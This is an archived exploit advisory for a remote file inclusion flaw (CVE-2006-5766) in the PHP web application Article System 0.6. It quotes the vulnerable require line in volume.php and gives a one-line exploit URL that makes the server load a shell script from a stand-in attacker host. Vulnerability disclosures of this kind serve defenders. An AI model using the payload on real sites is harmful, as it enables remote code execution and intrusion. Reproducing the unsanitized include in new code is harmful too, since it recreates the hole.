Article System 0.6 - 'volume.php' Remote File Inclusion

Author: GregStar
type: webapps
platform: php
port: 
date_added: 2006-11-01 
date_updated: 2016-09-14 
verified: 1 
codes: OSVDB-33968;CVE-2006-5766 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comartsys-0.6-20050508.tar.gz

**********************************************************************************************************

			                Coding 4 Fun (c4f.pl)

**********************************************************************************************************

* Article System 0.6 ;

* Class = Remote File Inclusion ;

* Download = http://sourceforge.net/project/showfiles.php?group_id=49971&package_id=43403&release_id=325871 ;

* Found by = GregStar (gregstar[at]c4f[dot]pl) ;

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code in volume.php:

 require "{$config['public_dir']}/templates/html/volume.php" ;


- Exploit:

http://[target]/[path]/volume.php?config[public_dir]=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------


Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,kw@ch and for all friends.



**************************************************************************************************************

# milw0rm.com [2006-11-02]